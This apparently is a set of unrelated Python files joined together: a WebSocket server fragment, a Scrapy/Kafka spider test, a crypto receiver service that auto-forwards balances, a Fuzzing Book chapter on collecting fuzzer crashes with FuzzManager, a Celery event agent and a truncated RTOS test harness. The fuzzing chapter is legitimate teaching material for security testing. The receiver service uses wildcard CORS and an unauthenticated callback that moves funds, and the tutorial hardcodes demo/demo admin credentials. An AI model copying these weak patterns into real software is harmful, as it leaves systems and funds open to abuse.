# # if the socket sending data matches the current
# # connection, don't send that data back to that socket
# if connection[0] != c:
# # if the session_url of the socket sending data
# # matches the session_url of the current connection,
# # send the data to that socket. Otherwise, don't send
# # the data to that socket.
# # This ensures that users with unique session_urls
# # only send data to and receive data from users
# # with matching session_urls
# if connection[2] == session_url:
# connection[0].send(data)
# # if the socket sends a disconnect signal
# if not data:
# print(str(a[0]) + ":" + str(a[1]),
# " disconnected from session", session_url)
# # remove the 3-tuple from the connections list
# self.connections.remove((c, a, session_url))
# # close the connection
# c.close()
# # stop the thread
# break
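# Note: after the handshake the client sends *masked* WebSocket frames, so the
# raw bytes printed above are not plain text. A minimal unmasking sketch for
# short (< 126 byte) text frames could look like the following (illustrative
# only; no fragmentation, extended lengths or close-frame handling):
#
#     def decode_text_frame(frame):
#         length = frame[1] & 0x7F          # payload length with the MASK bit stripped
#         mask = frame[2:6]                 # client-to-server frames are always masked
#         payload = frame[6:6 + length]
#         return bytes(b ^ mask[i % 4] for i, b in enumerate(payload)).decode("utf-8")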
def run(self):
while True:
# accepts a socket connection
c, a = self.sock.accept()
data = c.recv(1024).decode()
print(data)
websocket_response = (
"HTTP/1.1 101 Switching Protocols",
"Upgrade: websocket",
"Connection: Upgrade",
"Sec-WebSocket-Accept: {key}\r\n\r\n"
)
magic_string = b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
key = re.search(
r'Sec-WebSocket-Key:\s+(.*?)[\n\r]+', data).groups()[0].encode()
response_key = b64encode(sha1(key + magic_string).digest())
response = "\r\n".join(websocket_response).format(
key=response_key.decode())
c.send(response.encode())
print(response)
# on connection acceptance, the new socket
# sends the server the client's session_url
# session_url = c.recv(1024)
session_url = "test"
# server starts a thread for the client
cThread = threading.Thread(
target=self.handler, args=(c, a, session_url))
cThread.daemon = True
cThread.start()
# appends the 3-tuple (socket object, address, session_url)
# to the connections list
self.connections.append((c, a, session_url))
# print(self.connections)
print(str(a[0]) + ":" + str(a[1]),
"connected to session")
if __name__ == "__main__":
server = Server("localhost", 10000)
server.run()
|
online.py
|
'''
Online link spider test
'''
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import next
import unittest
from unittest import TestCase
import time
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import scrapy
import redis
from redis.exceptions import ConnectionError
import json
import threading, time
from crawling.spiders.link_spider import LinkSpider
from scrapy.utils.project import get_project_settings
from twisted.internet import reactor
from scrapy.crawler import CrawlerRunner
from kafka import KafkaConsumer
class CustomSpider(LinkSpider):
'''
Overridden link spider for testing
'''
name = "test-spider"
class TestLinkSpider(TestCase):
example_feed = "{\"allowed_domains\":null,\"allow_regex\":null,\""\
"crawlid\":\"abc12345\",\"url\":\"http://dmoztools.net/\",\"expires\":0,\""\
"ts\":1461549923.7956631184,\"priority\":1,\"deny_regex\":null,\""\
"cookie\":null,\"attrs\":null,\"appid\":\"test\",\"spiderid\":\""\
"test-link\",\"useragent\":null,\"deny_extensions\":null,\"maxdepth\":0}"
def setUp(self):
self.settings = get_project_settings()
self.settings.set('KAFKA_TOPIC_PREFIX', "demo_test")
# set up redis
self.redis_conn = redis.Redis(host=self.settings['REDIS_HOST'],
port=self.settings['REDIS_PORT'],
db=self.settings['REDIS_DB'])
try:
self.redis_conn.info()
except ConnectionError:
print("Could not connect to Redis")
# plugin is essential to functionality
sys.exit(1)
# clear out older test keys if any
keys = self.redis_conn.keys("test-spider:*")
for key in keys:
self.redis_conn.delete(key)
# set up kafka to consume potential results
self.consumer = KafkaConsumer(
"demo_test.crawled_firehose",
bootstrap_servers=self.settings['KAFKA_HOSTS'],
group_id="demo-id",
auto_commit_interval_ms=10,
consumer_timeout_ms=5000,
auto_offset_reset='earliest'
)
time.sleep(1)
def test_crawler_process(self):
runner = CrawlerRunner(self.settings)
d = runner.crawl(CustomSpider)
d.addBoth(lambda _: reactor.stop())
# add crawl to redis
key = "test-spider:dmoztools.net:queue"
self.redis_conn.zadd(key, self.example_feed, -99)
# run the spider, give 20 seconds to see the url, crawl it,
# and send to kafka. Then we kill the reactor
def thread_func():
time.sleep(20)
reactor.stop()
thread = threading.Thread(target=thread_func)
thread.start()
reactor.run()
message_count = 0
m = next(self.consumer)
if m is None:
pass
else:
the_dict = json.loads(m.value)
if the_dict is not None and the_dict['appid'] == 'test' \
and the_dict['crawlid'] == 'abc12345':
message_count += 1
self.assertEqual(message_count, 1)
def tearDown(self):
keys = self.redis_conn.keys('stats:crawler:*:test-spider:*')
keys = keys + self.redis_conn.keys('test-spider:*')
for key in keys:
self.redis_conn.delete(key)
# if for some reason the tests fail, we end up falling behind on
# the consumer
for m in self.consumer:
pass
self.consumer.close()
if __name__ == '__main__':
unittest.main()
|
receiver_service.py
|
import config
import account_helper
import node_rpc_helper
import recv_db
import recv_setup
import os
import json
from bottle import post, request, response, get, route, static_file
from threading import Thread
import requests
import time
def setHeaders():
response.content_type = 'application/json'
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
@route('/receiver/create_account', method='OPTIONS')
def createAccountOptions():
setHeaders()
return "OK"
# Example: curl -d "{'pool_account_id': 'ReceiverPool', 'pool_account_password': 'some_password'}" http://localhost:8090/receiver/create_account
@route('/receiver/create_account', method='POST')
def createAccountApi():
global config
setHeaders()
if config['receiver_service.enabled'] != 'true':
return {"error": "service not enabled"}
postdata = request.body.read().decode('utf8')
#print("postdata ", postdata)
postjson = json.loads(postdata.replace("'", '"'))
#print("postjson ", postjson)
if ("pool_account_id" not in postjson) or ("pool_account_password" not in postjson):
return {"error": "Missing pool account parameters"}
pool_account_id = postjson["pool_account_id"]
pool_account_password = postjson["pool_account_password"]
user_data = ''
if "user_data" in postjson:
user_data = postjson["user_data"]
res = createAccount(pool_account_id, pool_account_password, user_data)
recv_setup.setup_check_async()
return res
def createAccount(pool_account_id, pool_account_password, user_data):
global config
if (pool_account_id not in config["receiver_service.account"]) or (pool_account_password != config["receiver_service.account"][pool_account_id]["password"]):
return {"error": "source account not found or wrong password"}
src_walletid = config["receiver_service.account"][pool_account_id]["walletid"]
root_account = config["receiver_service.account"][pool_account_id]["account"]
#print("walletid ", src_walletid)
resp = node_rpc_helper.doCreateAccount(src_walletid)
if 'error' in resp:
return resp
if 'account' not in resp:
return {"error": "no account in response"}
account = resp['account']
account_idx = -1 # this is supposed to be the index of this account in the wallet, but we don't know it
try:
# OK, put it in DB
recv_db.add_new_rec_account(account, pool_account_id, user_data, root_account, account_idx, src_walletid)
except Exception as exc:
print("could not save to DB", account, exc)
return {
"account": account
}
# Invoked by the node, RPC callback
@route('/rpccallback', method='POST')
def rpcCallback():
global config
postdata = request.body.read().decode('utf8')
#print("postdata ", postdata)
postjson = json.loads(postdata.replace("'", '"'))
#print("postjson ", postjson)
if 'account' not in postjson:
print("Error: no account in callback info")
return
account = postjson['account']
print("RPC callback", "account", account)
# find receiver account in DB
pool_account_id = ''
try:
db_acc = recv_db.get_account(account)
#print(len(db_acc))
if len(db_acc) >= 1:
#print(db_acc[0])
if 'pool_account_id' in db_acc[0]:
pool_account_id = db_acc[0]['pool_account_id']
except Exception as exc:
print('Error looking up in DB', exc)
if (len(pool_account_id) <= 0) or (pool_account_id not in config['receiver_service.account']):
print('Could not match account to a configured receiver account!', account)
# DO NOT call into any webhooks... # invokeWebhookForPoolAccount('', account)
else:
# pool account is known
# check auto-forward
invokeWebhookForPoolAccount(pool_account_id, account)
handleAutoForward(account, pool_account_id, postjson)
return "ok"
# Call into the hook of a partner site, URL of the form 'https://mikron.io/webhook/{account}'
def invokeWebhookForPoolAccount(pool_account_id, account):
if (len(pool_account_id) <= 0) or (pool_account_id not in config['receiver_service.account']):
# no pool account, call into *all* webhooks anyways
for rec_account in config['receiver_service.account']:
if 'receiver_webhook' in config['receiver_service.account'][rec_account]:
webhook = config['receiver_service.account'][rec_account]['receiver_webhook']
#print(webhook)
invokeWebhook(webhook, account)
else:
if 'receiver_webhook' in config['receiver_service.account'][pool_account_id]:
webhook = config['receiver_service.account'][pool_account_id]['receiver_webhook']
#print(webhook)
invokeWebhook(webhook, account)
def invokeWebhook(webHookUrl, account):
url = webHookUrl.replace('{account}', account)
print("Invoking Web hook in background, url: ", url)
t = Thread(target=invokeInBg, args=(url,))
t.start()
def handleAutoForward(account, pool_account_id, postjson):
# check auto-forward
if pool_account_id in config['receiver_service.account']:
if 'auto_forward_to' in config['receiver_service.account'][pool_account_id]:
forward_acc = config['receiver_service.account'][pool_account_id]['auto_forward_to']
#print(forward_acc)
latest_balance = 0
if "block" in postjson:
block_json = json.loads(postjson["block"])
if "balance" in block_json:
latest_balance_str = block_json["balance"]
latest_balance = int(latest_balance_str)
#print("latest_balance", latest_balance)
if latest_balance > 0:
wallet_id = config['receiver_service.account'][pool_account_id]['walletid']
unique_id = str(time.time()) + account[:16]
latest_balance_mik = account_helper.fromRawToMikron(latest_balance)
#print("latest_balance_mik", latest_balance_mik)
node_rpc_helper.doSend(wallet_id, account, forward_acc, latest_balance_mik, unique_id)
print("Auto forwarded", latest_balance_mik, "to", forward_acc)
def invokeInBg(url):
response = requests.get(url)
print(response.url, response.text[:200])
@route('/receiver/get_status', method='GET')
def get_status():
setHeaders()
return {"status": recv_setup.get_setup_check_background()}
config = config.readConfig()
|
FuzzingInTheLarge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Fuzzing in the Large" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
# Last change: 2021-10-19 15:30:44+02:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Fuzzing in the Large
This file can be _executed_ as a script, running all experiments:
$ python FuzzingInTheLarge.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.FuzzingInTheLarge import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
The Python `FuzzManager` package allows for programmatic submission of failures from a large number of (fuzzed) programs. One can query crashes and their details, collect them into buckets to ensure they will be treated the same, and also retrieve coverage information for debugging both programs and their tests.
For more details, source, and documentation, see
"The Fuzzing Book - Fuzzing in the Large"
at https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Fuzzing in the Large
# ====================
if __name__ == '__main__':
print('# Fuzzing in the Large')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Fuzzer
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Collecting Crashes from Multiple Fuzzers
## ----------------------------------------
if __name__ == '__main__':
print('\n## Collecting Crashes from Multiple Fuzzers')
from graphviz import Digraph
if __name__ == '__main__':
g = Digraph()
server = 'Crash Server'
g.node('Crash Database', shape='cylinder')
for i in range(1, 7):
g.edge('Fuzzer ' + repr(i), server)
g.edge(server, 'Crash Database')
g
## Running a Crash Server
## ----------------------
if __name__ == '__main__':
print('\n## Running a Crash Server')
### Excursion: Setting up the Server
if __name__ == '__main__':
print('\n### Excursion: Setting up the Server')
import os
import sys
import shutil
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
if os.path.exists('FuzzManager'):
shutil.rmtree('FuzzManager')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/MozillaSecurity/FuzzManager')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; git checkout 0.4.1')
if __name__ == '__main__':
import os
os.system(f'pip install -r FuzzManager/server/requirements.txt > /dev/null')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python server/manage.py migrate > /dev/null')
if __name__ == '__main__':
import os
os.system(f'(cd FuzzManager; echo "from django.contrib.auth import get_user_model; User = get_user_model(); User.objects.create_superuser(\'demo\', \'demo@fuzzingbook.org\', \'demo\')" | python server/manage.py shell)')
import subprocess
import sys
if __name__ == '__main__':
os.chdir('FuzzManager')
result = subprocess.run(['python',
'server/manage.py',
'get_auth_token',
'demo'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
os.chdir('..')
err = result.stderr.decode('ascii')
if len(err) > 0:
print(err, file=sys.stderr, end="")
if __name__ == '__main__':
token = result.stdout
token = token.decode('ascii').strip()
token
if __name__ == '__main__':
assert len(token) > 10, "Invalid token " + repr(token)
if __name__ == '__main__':
home = os.path.expanduser("~")
conf = os.path.join(home, ".fuzzmanagerconf")
if __name__ == '__main__':
fuzzmanagerconf = """
[Main]
sigdir = /home/example/fuzzingbook
serverhost = 127.0.0.1
serverport = 8000
serverproto = http
serverauthtoken = %s
tool = fuzzingbook
""" % token
if __name__ == '__main__':
with open(conf, "w") as file:
file.write(fuzzmanagerconf)
from pygments.lexers.configs import IniLexer
from .bookutils import print_file
if __name__ == '__main__':
print_file(conf, lexer=IniLexer())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting the Server
if __name__ == '__main__':
print('\n### Excursion: Starting the Server')
from multiprocess import Process
import subprocess
def run_fuzzmanager():
def run_fuzzmanager_forever():
os.chdir('FuzzManager')
proc = subprocess.Popen(['python', 'server/manage.py',
'runserver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
while True:
line = proc.stdout.readline()
print(line, end='')
fuzzmanager_process = Process(target=run_fuzzmanager_forever)
fuzzmanager_process.start()
return fuzzmanager_process
if __name__ == '__main__':
fuzzmanager_process = run_fuzzmanager()
import time
if __name__ == '__main__':
time.sleep(2)
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Logging In
if __name__ == '__main__':
print('\n### Logging In')
if __name__ == '__main__':
fuzzmanager_url = "http://127.0.0.1:8000"
if __name__ == '__main__':
from IPython.display import display, Image
from .bookutils import HTML, rich_output
from .GUIFuzzer import start_webdriver # minor dependency
if __name__ == '__main__':
gui_driver = start_webdriver(headless=True, zoom=1.2)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 600)
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
username = gui_driver.find_element_by_name("username")
username.send_keys("demo")
if __name__ == '__main__':
password = gui_driver.find_element_by_name("password")
password.send_keys("demo")
if __name__ == '__main__':
login = gui_driver.find_element_by_tag_name("button")
login.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Crashes
## ------------------
if __name__ == '__main__':
print('\n## Collecting Crashes')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy')
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make)')
from .bookutils import print_file
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.cpp")
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.fuzzmanagerconf", lexer=IniLexer())
if __name__ == '__main__':
import os
os.system(f'simply-buggy/simple-crash')
import subprocess
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
if __name__ == '__main__':
result = subprocess.run(cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Yay, we crashed!")
else:
print("Move along, nothing to see...")
### Program Configurations
if __name__ == '__main__':
print('\n### Program Configurations')
if __name__ == '__main__':
sys.path.append('FuzzManager')
if __name__ == '__main__':
from FTB.ProgramConfiguration import ProgramConfiguration
if __name__ == '__main__':
configuration = ProgramConfiguration.fromBinary('simply-buggy/simple-crash')
(configuration.product, configuration.platform)
### Crash Info
if __name__ == '__main__':
print('\n### Crash Info')
if __name__ == '__main__':
from FTB.Signatures.CrashInfo import CrashInfo
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
result = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if __name__ == '__main__':
stderr = result.stderr.decode().splitlines()
stderr[0:3]
if __name__ == '__main__':
stdout = result.stdout.decode().splitlines()
stdout
if __name__ == '__main__':
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
print(crashInfo)
### Collector
if __name__ == '__main__':
print('\n### Collector')
if __name__ == '__main__':
from Collector.Collector import Collector
if __name__ == '__main__':
collector = Collector()
if __name__ == '__main__':
collector.submit(crashInfo)
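# To summarise the submission workflow shown above: ProgramConfiguration.fromBinary()
# reads the *.fuzzmanagerconf file next to the target binary,
# CrashInfo.fromRawCrashData() parses the raw stdout/stderr (e.g. an ASan trace)
# into a generic crash report, and Collector().submit() sends that report to the
# configured crash server.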
### Inspecting Crashes
if __name__ == '__main__':
print('\n### Inspecting Crashes')
if __name__ == '__main__':
gui_driver.refresh()
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
crash = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/crashmanager/crashes/")]')
crash.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Crash Buckets
## -------------
if __name__ == '__main__':
print('\n## Crash Buckets')
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
create = gui_driver.find_element_by_xpath('//a[contains(@href,"/signatures/new/")]')
create.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1200)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
save = gui_driver.find_element_by_name("submit_save")
save.click()
time.sleep(1)
### Crash Signatures
if __name__ == '__main__':
print('\n### Crash Signatures')
if __name__ == '__main__':
gui_driver.set_window_size(1400, 800)
Image(gui_driver.get_screenshot_as_png())
### Coarse-Grained Signatures
if __name__ == '__main__':
print('\n### Coarse-Grained Signatures')
if __name__ == '__main__':
print_file("simply-buggy/out-of-bounds.cpp")
import os
import random
import subprocess
import tempfile
import sys
#### Excursion: `escapelines()` implementation
if __name__ == '__main__':
print('\n#### Excursion: `escapelines()` implementation')
def isascii(s):
return all([0 <= ord(c) <= 127 for c in s])
if __name__ == '__main__':
isascii('Hello,')
def escapelines(bytes):
def ascii_chr(byte):
if 0 <= byte <= 127:
return chr(byte)
return r"\x%02x" % byte
def unicode_escape(line):
ret = "".join(map(ascii_chr, line))
assert isascii(ret)
return ret
return [unicode_escape(line) for line in bytes.splitlines()]
if __name__ == '__main__':
escapelines(b"Hello,\nworld!")
if __name__ == '__main__':
escapelines(b"abc\xffABC")
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
if __name__ == '__main__':
cmd = ["simply-buggy/out-of-bounds"]
# Connect to crash server
collector = Collector()
random.seed(2048)
crash_count = 0
TRIALS = 20
for itnum in range(0, TRIALS):
rand_len = random.randint(1, 1024)
rand_data = bytes([random.randrange(0, 256) for i in range(rand_len)])
(fd, current_file) = tempfile.mkstemp(prefix="fuzztest", text=True)
os.write(fd, rand_data)
os.close(fd)
current_cmd = []
current_cmd.extend(cmd)
current_cmd.append(current_file)
result = subprocess.run(current_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = [] # escapelines(result.stdout)
stderr = escapelines(result.stderr)
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
print(itnum, end=" ")
if crashed:
sys.stdout.write("(Crash) ")
# This reads the simple-crash.fuzzmanagerconf file
configuration = ProgramConfiguration.fromBinary(cmd[0])
# This reads and parses our ASan trace into a more generic format,
# returning us a generic "CrashInfo" object that we can inspect
# and/or submit to the server.
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
# Submit the crash
collector.submit(crashInfo, testCase = current_file)
crash_count += 1
os.remove(current_file)
print("")
print("Done, submitted %d crashes after %d runs." % (crash_count, TRIALS))
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/crashmanager/crashes")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Code Coverage
## ------------------------
if __name__ == '__main__':
print('\n## Collecting Code Coverage')
if __name__ == '__main__':
print_file("simply-buggy/maze.cpp")
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make clean && make coverage)')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy $HOME/simply-buggy-server ')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 server/manage.py setup_repository simply-buggy GITSourceCodeProvider $HOME/simply-buggy-server')
import random
import subprocess
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
constants = [3735928559, 1111638594]
TRIALS = 1000
for itnum in range(0, TRIALS):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0, 4):
if random.randint(0, 9) < 3:
current_cmd.append(str(constants[
random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr and "secret" in stderr[0]:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
if __name__ == '__main__':
import os
os.system(f'export PATH=$HOME/.cargo/bin:$PATH; grcov simply-buggy/ -t coveralls+ --commit-sha $(cd simply-buggy && git rev-parse HEAD) --token NONE -p `pwd`/simply-buggy/ > coverage.json')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 -mCovReporter --repository simply-buggy --description "Test1" --submit ../coverage.json')
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/covmanager")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
first_id = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/browse")]')
first_id.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
maze_cpp = gui_driver.find_element_by_xpath("//*[contains(text(), 'maze.cpp')]")
maze_cpp.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1400)
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
# Added the missing constant here
constants = [3735928559, 1111638594, 3405695742]
for itnum in range(0,1000):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0,4):
if random.randint(0, 9) < 3:
current_cmd.append(str(
constants[random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
fuzzmanager_process.terminate()
if __name__ == '__main__':
gui_driver.quit()
import shutil
if __name__ == '__main__':
for temp_file in ['coverage.json', 'geckodriver.log', 'ghostdriver.log']:
if os.path.exists(temp_file):
os.remove(temp_file)
if __name__ == '__main__':
home = os.path.expanduser("~")
for temp_dir in ['coverage', 'simply-buggy', 'simply-buggy-server',
os.path.join(home, 'simply-buggy-server'),
'FuzzManager']:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Automatic Crash Reporting
if __name__ == '__main__':
print('\n### Exercise 1: Automatic Crash Reporting')
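# A possible starting point for this exercise (an added sketch, not a reference
# solution): combine the pieces used throughout this chapter -- run the target,
# check its AddressSanitizer output, and submit a CrashInfo via the Collector.
# The function name and signature below are our own choices; ProgramConfiguration,
# CrashInfo, and Collector come from the FuzzManager imports above.
def report_if_crashed(binary, args, testcase=None):
    """Run `binary` with `args`; if ASan reports an error, submit it to FuzzManager.
    Returns True if a crash was submitted."""
    result = subprocess.run([binary] + list(args),
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stderr = result.stderr.decode(errors='replace').splitlines()
    if not any("ERROR: AddressSanitizer" in line for line in stderr):
        return False
    configuration = ProgramConfiguration.fromBinary(binary)
    crash_info = CrashInfo.fromRawCrashData([], stderr, configuration)
    Collector().submit(crash_info, testCase=testcase)
    return True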
|
agent.py
|
import gevent
from gevent import monkey
monkey.patch_all()
import json
from signal import signal, SIGTERM
from multiprocessing import Process
from leek.agent.logger import get_logger
from leek.agent.consumer import LeekConsumer
logger = get_logger(__name__)
class LeekAgent:
"""Main server object, which:
- Load subscriptions from config file.
- Orchestrates capturing of celery events.
- Fanout to API webhooks endpoints
"""
def __init__(self):
self.consumers = []
self.proc = []
self.subscriptions = self.load_subscriptions()
self.loop = None
if not len(self.subscriptions):
logger.warning("No subscriptions found, Consider adding subscriptions through environment variable or UI.")
return
logger.info("Building consumers...")
for subscription in self.subscriptions:
subscription_name = self.infer_subscription_name(subscription)
consumer = LeekConsumer(subscription_name, **subscription)
self.consumers.append(consumer)
logger.info("Consumers built...")
@staticmethod
def infer_subscription_name(subscription):
return f"{subscription.get('app_name')}-{subscription.get('app_env')}"
@staticmethod
def load_subscriptions():
logger.info(f"Loading subscriptions...")
# FROM JSON FILE
subscriptions_file = "/opt/app/conf/subscriptions.json"
with open(subscriptions_file) as json_file:
subscriptions = json.load(json_file)
logger.info(f"Found {len(subscriptions)} subscriptions!")
return subscriptions
def start(self):
if not len(self.consumers):
return
logger.info("Starting Leek Agent...")
signal(SIGTERM, self.stop)
for consumer in self.consumers:
p = Process(target=consumer.run)
p.start()
self.proc.append(p)
for p in self.proc:
p.join()
logger.info("Leek Agent stopped!")
def stop(self, _signal_received, _frame):
# Handle any cleanup here
print("SIGTERM detected. Exiting gracefully")
for p in self.proc:
p.kill()
if __name__ == '__main__':
LeekAgent().start()
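# Illustration only (not part of the agent): load_subscriptions() expects a JSON
# list at /opt/app/conf/subscriptions.json. Each entry must at least carry
# `app_name` and `app_env` (used above to infer the subscription name); every
# other key is passed straight to LeekConsumer as a keyword argument, so the
# exact set depends on that class. A hypothetical entry could look like:
#
# [
#     {
#         "app_name": "orders",
#         "app_env": "prod"
#     }
# ]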
|
device.py
|
import importlib
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import pexpect
import pexpect.fdpexpect
import serial
from pexpect.exceptions import TIMEOUT, EOF
from .config import PHRTOS_PROJECT_DIR, DEVICE_SERIAL
from .tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
QEMU_CMD = {
'ia32-generic': (
'qemu-system-i386',
[
'-hda', f'{PHRTOS_PROJECT_DIR}/_boot/phoenix-ia32-generic.disk',
'-nographic',
'-monitor', 'none'
]
)
}
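# Supporting another emulated target amounts to adding an entry here and to
# RunnerFactory.create() at the bottom of this file. A purely hypothetical
# sketch (binary name and arguments are assumptions, not a tested setup):
#
# QEMU_CMD['riscv64-generic'] = (
#     'qemu-system-riscv64',
#     ['-kernel', f'{PHRTOS_PROJECT_DIR}/_boot/phoenix-riscv64-generic.elf',
#      '-nographic', '-monitor', 'none']
# )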
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::psu\n')
while True:
line = self.proc.stdout.readline().decode('utf-8')
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
self.proc = subprocess.Popen(
['psu', f'{self.script}'],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
cwd=self.cwd
)
self.read_output()
self.proc.wait()
if self.proc.returncode != 0:
logging.error(f'Command {" ".join(self.proc.args)} with pid {self.proc.pid} failed!\n')
raise Exception('Flashing IMXRT106x failed')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
